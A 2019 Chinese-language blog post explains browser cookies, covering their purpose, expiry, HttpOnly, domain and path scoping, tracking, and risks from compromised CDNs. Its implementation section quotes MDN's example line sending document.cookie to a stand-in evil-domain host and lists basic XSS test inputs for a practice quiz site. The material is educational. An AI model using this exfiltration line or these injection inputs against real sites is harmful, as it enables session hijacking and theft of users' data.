---
layout: post
title: "Cookies 功能教學"
subtitle: "淺談 Cookies 的相關應用"
date: 2019-01-22
author: "Lin Yen-Cheng"
catalog: true
tags:
  - JavaScript
---

### 為什麼需要 Cookie?

因為瀏覽器並沒有幫我們保存相關的狀態，所以若是需要在重新整理或是再次開啟相關頁面時回到上一次的狀態時，就需要從可以取得狀態的地方來恢復了，cookie 則提供了這樣的一個存放空間。

當然瀏覽器也有提供 storage 提供大家使用，分別來看 cookie 和 storage 最大的差異在是否會跟著請求回到伺服器。而在行銷上，cookie 也因為會跟著請求回到伺服器這個特性，常被用來紀錄特定的消費者行為。

### Cookie 要存多久?

在我的認知上，存多久要依照商業邏輯而定，存取的方式會依照 cookie 的不同而有所不同。譬如我們希望使用者在一天內不需要重新登入，我們就可以設定一天。

### 如何存取?

[MDN 的文件][1]上直接說這樣的機制本身是不安全的，但比起使用瀏覽器本身的 storage，cookie 至少還有參數可以設定。

Cookie 若從設定來看可以粗分成兩種，那個參數就是 HttpOnly ，當 cookie 帶有 HttpOnly 這個參數的時候，代表是由伺服器產生的，就只有伺服器端可以進行操作，若無則可以從瀏覽器端透過程式來操作，也就是透過 document.cookie 來存取，這時候就會出現文件上提到的，會有一些攻擊的問題。

回到 cookie 是為了儲存瀏覽器的狀態，當然瀏覽器也有提供 storage 提供大家使用，cookie 和 storage 最大的差異在是不是會跟著請求回到伺服器，另外上面提到 cookie 會隨著請求一起回到伺服器，若是也需要規範的話 cookie 有 domain 以及路徑的設定。

### 安全機制

想到的有設計拿取敏感資料的 Token 限使用一次、綁定裝置的 Fingerprint 甚至是 IP 位置。在文件中有個殭屍 cookie 或是 Facebook 像素我覺得也是類似的概念，都是用來鎖定使用者，在使用者做任何動作的時候，就同時把這樣的動作和這個 ID 進行綁定，這樣一來只要下次又發現這個 id 我們就可以進行對應行動。

### 資安問題

首先最簡單的是如果函式庫 CDN 的來源如果是不安全的(來源是來自海峽對岸? (所以內建 function 固定把資料傳回北京(誤，今天只要 CDN 的函式庫被駭客駭掉了，當連結不變及原有的封裝不變的前題下，裡面簡單放一些偷資訊的程式碼，也許在你一定會按到的按鈕上面又加上 onClick 事件，在你按下去的過程中，資料就會在沒有注意到的情況下被送出去了。

### 實作:

主要都是想辦法讓我們的 script 可以在其他人的網站執行，react 的 props 就會[特別註明 dangerously 像是這個 dangerouslySetInnerHTML][2]，這就代表是會執行的部分，假設今天被埋了一張假的圖片，底下是 MDN 上的範例，這樣似乎代表圖片載入的時候，我們的 cookie 也爆露了。

```js
new Image().src =
  "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie;
```

底下有一個網站可以讓大家練習，透過輸入框的輸入來執行我們的腳本，也是在測試的過程中發現 Chrome 超厲害竟然會自己偵測危險，也許是這樣的錯誤太低級了吧。最近也有個小發現， 當我們在瀏覽器裡面停用 cookie 的時候 sessionStorage 跟 localStorage 也會被擋，那重新整理又需要狀態怎麼辦，Facebook 的解決方法是把你登出，

[http://xss-quiz.int21h.jp/](http://xss-quiz.int21h.jp/)

- `aaa<bbb>ccc/ddd'eee"fff;ggg:hhh`
- `<script> alert(document.domain) </script>`
- `"><script> alert(document.domain) </script>`

[1]: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
[2]: https://reactjs.org/docs/dom-elements.html
